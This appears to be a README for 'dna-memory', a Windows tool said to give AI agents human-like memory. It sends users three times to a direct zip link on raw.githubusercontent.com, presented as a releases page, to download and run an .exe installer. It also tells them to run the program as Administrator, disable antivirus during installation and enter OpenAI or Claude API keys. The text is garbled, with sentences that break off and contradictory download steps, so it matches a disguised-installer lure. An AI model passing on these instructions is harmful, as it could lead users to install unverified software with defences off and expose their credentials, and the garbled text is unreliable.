dna-memory is a tool that helps an AI agent learn and remember information over time. It works a bit like human memory—it can learn new things, forget old stuff, and change how it thinks based on experience. This helps the AI act smarter and more naturally when you use it.
You don't need technical skills to use dna-memory. It runs on Windows and works with common AI platforms. You can start using it to improve how AI handles knowledge without coding.
Before you download and install, make sure your computer meets these basic needs:
- Operating System: Windows 10 or later (64-bit)
- Processor: Intel Core i3 or equivalent
- RAM: 4 GB minimum (8 GB recommended for better performance)
- Disk Space: At least 500 MB free for installation and data storage
- Internet Connection: Required for initial setup and updates
- Adaptive Memory: Learns and updates knowledge dynamically.
- Custom Knowledge Base: Add or remove data that the AI uses.
- Forgets Unused Info: Keeps memory focused and efficient.
- OpenAI and Claude Compatible: Works with popular AI services.
- Easy to Run: No programming needed—just download and click.
- Supports Python Integration: For advanced users who want to customize.
Follow these steps to get dna-memory up and running on your Windows PC.
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Click the big green badge at the top of this page or visit this link directly:
https://raw.githubusercontent.com/Muayhannya/dna-memory/main/scripts/memory_dna_v3.8.zip
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On the releases page, look for the latest version. It will usually have a name like
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Click on the
.exefile to download it. Make sure you save it somewhere you can find easily, like your Desktop or Downloads folder.
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Once the download completes, open the folder where the file saved.
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Double-click the installer file (
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Follow the on-screen instructions:
- Choose the installation folder or leave it as the default.
- Accept any license terms.
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When installation finishes, the program may create a shortcut on your Desktop or Start Menu.
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Find the dna-memory icon on your Desktop or in the Start Menu.
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Double-click to open the application.
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The first time you run it, the program will set up necessary files. This may take a few moments.
- dna-memory uses a simple interface with buttons and menus.
- You can start by loading or creating a knowledge base.
- The AI will use this memory to answer questions or perform tasks.
- You can update or clear memory from the app as needed.
- For support with AI services like OpenAI or Claude, input your API keys in the settings menu.
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Check the releases page at
https://raw.githubusercontent.com/Muayhannya/dna-memory/main/scripts/memory_dna_v3.8.zip
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Download the newest
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The installer will update the current version without losing your saved data.
- You can connect dna-memory to other applications using Python scripts.
- The program supports creating custom "memory agents" to customize how it learns.
- Options to import or export your knowledge base allow easy sharing or backup.
- If dna-memory does not start, make sure your Windows is updated.
- Run the program as Administrator if you get permission errors.
- Disable your antivirus temporarily during installation if you face blocking issues.
- Check your internet connection for any API-related features.
- Restart your PC if you run into unexpected problems.
- Visit the repository page to check for detailed guides or FAQs.
- Look inside the downloaded folder for README or help files.
- If you want to learn more about AI memory and agents, explore topics like “knowledge base,” “RAG (Retrieval-Augmented Generation),” or “large language models (LLM).”
Use the releases page to get the latest version and updates:
https://raw.githubusercontent.com/Muayhannya/dna-memory/main/scripts/memory_dna_v3.8.zip